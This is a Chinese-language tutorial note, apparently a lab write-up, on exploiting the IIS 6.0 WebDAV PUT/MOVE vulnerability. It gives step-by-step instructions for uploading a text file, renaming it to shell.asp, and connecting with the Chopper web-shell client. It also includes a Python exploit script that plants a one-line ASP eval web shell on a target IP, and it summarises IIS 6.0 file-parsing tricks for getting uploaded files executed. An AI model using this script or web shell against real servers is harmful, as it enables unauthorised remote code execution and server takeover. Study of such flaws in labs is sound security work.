title: IIS6.0 PUT漏洞
tags: 環境配置,漏洞利用
grammar_cjkRuby: true
一、IIS6.0PUT漏洞的利用
演示:
轉載自:https://www.2cto.com/article/201311/259656.html
利用IIS PUT Scaner掃描有漏洞的iis,此漏洞主要是因為服務器開啟了webdav的組件導致的可以掃描到當前的操作,具體操作其實是通過webdav的OPTION來查詢是否支持PUT。
具體的原理: http://www.2cto.com/Article/201307/228165.html
為了驗證是否是webdav組件的問題,我們現在把webdav禁用掉,立刻就會在put下面顯示NO,這就是因為IIS PUT SCANER通過webdav查詢的時候查不到PUT了。
為了下面的實驗,先把webdav打開。然后利用桂林老兵的iiswriter
然后提交數據包,會在服務端生成一個1.txt的文件,但是這個文件是無法被iis解析的,所以要利用到的是MOVE,主要目的是為了將txt的文件修改為asp的,從而可以將文件變成可執行的腳本文件。
驗證一下,確實存在shell.asp文件
用菜刀鏈接
菜刀成功連接
二、IIS6.0PUT漏洞的利用槽點
1.利用思路總結:
首先PUT(txt)數據包到服務器端,然后利用MOVE方法將上傳的數據包腳本更為shell.asp。再訪問該腳本即可
2.環境配置:以上是理想情況,實際環境中需要服務器端具備以下前提
IIS6.0寫權限開啟
IIS6.0允許訪問腳本資源權限開啟(也可利用解析漏洞解決)
IIS6.0的webDAV擴展設為允許
3.利用途中可能產生的問題
PUT asp腳本到IIS6.0會返回404
所以只能PUT IIS6.0不能解析的文件,如jpg,txt格式
未開啟寫權限時返回403
在屬性中的主目錄下開啟寫入權限
以上權限配置完后PUT腳本顯示401
(猜測:服務器的安全配置)
這一步沒有思考到解決問題的思路,通過搜索關鍵字IIS 得出
win系統的network用戶 權限管理需要設置讀取和運行,寫入
返回狀態碼207代表利用成功
但是如果未開啟腳本資源訪問權限,則實際並沒有更改成功(返回未207)
三、IIS6.0PUT漏洞的利用腳本--python
#encoding="utf-8"
import requests
#分別需要put,move的url
put_url = 'http://192.168.111.139/2.txt'
move_url = 'http://192.168.111.139/2.txt'
move_headers = {
'Destination':'http://192.168.111.139/shell9.asp'
}
#put的腳本
put_data = "<%eval request('apple')%>"
#最終的連接腳本,但似乎連接不成功
post_data = {
'apple':''
}
try:
response = requests.request('PUT',url=put_url,data=put_data)
if response.status_code == 200:
response = requests.request('MOVE',url=move_url,headers=move_headers)
if response.status_code == 207:
response = requests.post(url='http://192.168.111.139/shell9.asp',data=post_data)
print(response.content.decode("gb2312"))
else:
print(response.status_code)
except:
pass
順帶復習下IIS6.0的解析漏洞
IIS6.0解析漏洞分兩種
1、目錄解析
以*.asp命名的文件夾里的文件都將會被當成ASP文件執行。
2、文件解析
*.asp;.jpg 像這種畸形文件名在“;”后面的直接被忽略,也就是說當成 *.asp文件執行。
IIS6.0 默認的可執行文件除了asp還包含這三種 *.asa *.cer *.cdx
參考:
https://cloud.tencent.com/info/bb174aee9d971192fa38127e48aadc8b.html
https://www.webshell.cc/4294.html
https://www.2cto.com/article/201311/259656.html